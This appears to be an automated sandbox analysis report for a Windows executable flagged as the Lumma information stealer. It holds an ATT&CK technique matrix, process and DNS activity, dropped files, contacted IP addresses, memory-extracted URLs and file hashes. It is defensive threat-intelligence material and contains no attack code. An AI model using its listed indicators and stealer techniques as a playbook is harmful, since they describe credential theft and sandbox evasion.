Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Windows Management Instrumentation | 1 DLL Side-Loading | 12 Process Injection | 1 Masquerading | 11 Input Capture | 21 Security Software Discovery | Remote Services | 11 Input Capture | 1 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | 1 Command and Scripting Interpreter | 1 DLL Search Order Hijacking | 1 DLL Side-Loading | 41 Virtualization/Sandbox Evasion | LSASS Memory | 2 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Search Order Hijacking | 12 Process Injection | Security Account Manager | 41 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Search Order Hijacking | LSA Secrets | 1 Remote System Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Steganography | Cached Domain Credentials | 2 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Compile After Delivery | DCSync | 32 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
Behavior Graph ID: 1579955, Sample: SalmonSamurai.exe, Startdate: 23/12/2024, Architecture: WINDOWS, Score: 42

  • Signature: Multi AV Scanner detection for submitted file
  • Process started: SalmonSamurai.exe
  • Dropped files: C:\Users\user\AppData\...\SalmonSamurai.exe, PE32+; C:\Users\user\AppData\...\vulkan-1.dll, PE32+; C:\Users\user\AppData\...\vk_swiftshader.dll, PE32+; 5 other files (none is malicious)
  • Signature: Drops large PE files
  • Process started: SalmonSamurai.exe
  • DNS/IP: 89.187.28.253, 49853, 80, UA-WICOMWiMAXUkraineAutonomousSystemUA, Ukraine
  • Processes started: powershell.exe, powershell.exe, powershell.exe, 21 other processes
  • Signature: Loading BitLocker PowerShell Module
  • DNS/IP: chrome.cloudflare-dns.com, 172.64.41.3, 443, 49782, 49783, CLOUDFLARENETUS, United States
  • Processes started: conhost.exe (6 shown), 18 other processes

Source | Detection | Scanner | Label | Link
SalmonSamurai.exe | 30% | ReversingLabs | Win32.Trojan.LummaStealer

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exe | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\ffmpeg.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\libEGL.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\libGLESv2.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\resources\elevate.exe | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\vk_swiftshader.dll | 0% | ReversingLabs
C:\Users\user\AppData\Roaming\NsisExtracted\vulkan-1.dll | 0% | ReversingLabs

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://crbug.com/dawn/1276 | 0% | Avira URL Cloud | safe
https://bugs.chromium.org/p/dawn/issues/detail?id=434timestamp-querySupport | 0% | Avira URL Cloud | safe
https://crbug.com/dawn/537 | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
chrome.cloudflare-dns.com | 172.64.41.3 | true | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                                                                    high
                                                                                                                                    https://ch.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://developers.cloudflare.com/1.1.1.1/privacy/public-dns-resolver/CloudflareSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://crbug.com/dawn/582SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://crbug.com/dawn/1083SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://crbug.com/dawn/343SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://crbug.com/dawn/342SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://nl.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://search.goo.ne.jp/cdn/common/img/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://crbug.com/tint/1003SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://www.sogou.com/images/logo/old/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://in.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                http://search.imesh.net/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://pe.search.yahoo.com/favicon.icohttps://pe.search.yahoo.com/searchSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://crbug.com/dawn/792SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      http://arianna.libero.it/search/abin/integrata.cgi?query=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://odvr.nic.cz/dohSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://crbug.com/dawn/673SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AFF5000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            http://imgs.sapo.pt/images/sapo.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://search.privacywall.org/suggest.php?q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://de.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://ar.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.quad9.net/home/privacy/SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://www.yandex.ua/chrome/newtabSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://id.search.yahoo.com/favicon.icoSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://search.daum.net/search?w=tot&DA=JU5&q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://search.naver.com/search.naver?ie=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://search.daum.net/favicon.icohttps://search.daum.net/search?w=tot&DA=JU5&q=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                http://nigma.ru/themes/nigma/img/favicon.icohttp://nigma.ru/?s=SalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75B067000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000017.00000000.1635503730.00007FF75B067000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://doh.cleanbrowsing.org/doh/adult-filterSalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://doh-01.spectrum.com/dns-querySalmonSamurai.exe, 00000009.00000000.1540265311.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmp, SalmonSamurai.exe, 00000016.00000000.1605751375.00007FF75AB3D000.00000002.00000001.01000000.00000006.sdmpfalse
                                                                                                                                                                                                      high
IP              Domain                      Country         ASN     ASN Name                                 Malicious
89.187.28.253   unknown                     Ukraine         39810   UA-WICOMWiMAXUkraineAutonomousSystemUA   false
172.64.41.3     chrome.cloudflare-dns.com   United States   13335   CLOUDFLARENETUS                          false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1579955
Start date and time: 2024-12-23 16:50:23 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 42s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 63
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SalmonSamurai.exe
Detection: MAL
Classification: mal42.evad.winEXE@77/139@2/2
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.251.40.163, 13.107.246.63, 20.109.210.53, 184.28.90.27
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, www.gstatic.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                                      • VT rate limit hit for: SalmonSamurai.exe
Time | Type | Description
12:24:29 | API Interceptor | 373x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
172.64.41.3 | nTyPEbq9wQ.lnk | malicious | Unknown
172.64.41.3 | gVKsiQIHqe.exe | malicious | Vidar
172.64.41.3 | trZG6pItZj.exe | malicious | Vidar
172.64.41.3 | Loader.exe | malicious | RHADAMANTHYS
172.64.41.3 | Ocean-T2I4I8O9.exe | malicious | Unknown
172.64.41.3 | ktyihkdfesf.exe | malicious | Vidar
172.64.41.3 | pjthjsdjgjrtavv.exe | malicious | Vidar
172.64.41.3 | file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar
172.64.41.3 | RECOUVREMENT -FACTURER1184521.pdf | malicious | Unknown
172.64.41.3 | QhR8Zp6fZs.lnk | malicious | RHADAMANTHYS
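Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | NativeApp_G5L1NHZZ.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | CapCut_12.0.4_Installer.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | AyqwnIUrcz.exe | malicious | Unknown
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | nanophanotool.exe | malicious | LummaC Stealer
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | 9VbeqQbgU4.exe | malicious | RedLine, SectopRAT
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | 9VbeqQbgU4.exe | malicious | RedLine, SectopRAT
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | ivySCI-5.6.3.exe | malicious | Unknown
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | ivySCI-5.6.3.exe | malicious | Unknown
C:\Users\user\AppData\Roaming\NsisExtracted\d3dcompiler_47.dll | MayitaV16.exe | malicious | Unknown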
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3008
                                                                                                                                                                                                                                              Entropy (8bit):5.486168185857723
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:XizsSU4y4RQmFoUeCamfm9qr9t5/78NQffiiuxJZKaVEouYAgwd64rHLjtvWb:XizlHyIFKL2O9qrh7KWKjJ5Eo9Adrxe
                                                                                                                                                                                                                                              MD5:1C9E2D02C96098B42F60D9435132B56E
                                                                                                                                                                                                                                              SHA1:4969E22BF059BFCD6AC4C67DAD7D60CE11F653A8
                                                                                                                                                                                                                                              SHA-256:A78134BBA0FD8E794B3197EE7F8B7E74A3C2444181562AF80A7533FD328DE63A
                                                                                                                                                                                                                                              SHA-512:10B5E519A96D93D07F74E5B220BCE40860654CFA773E92747E74B0E76D24244188C56C33BCD2333BB8F45BCB81CDD1425854250F9D34D4ED24732FF91F27CFAA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
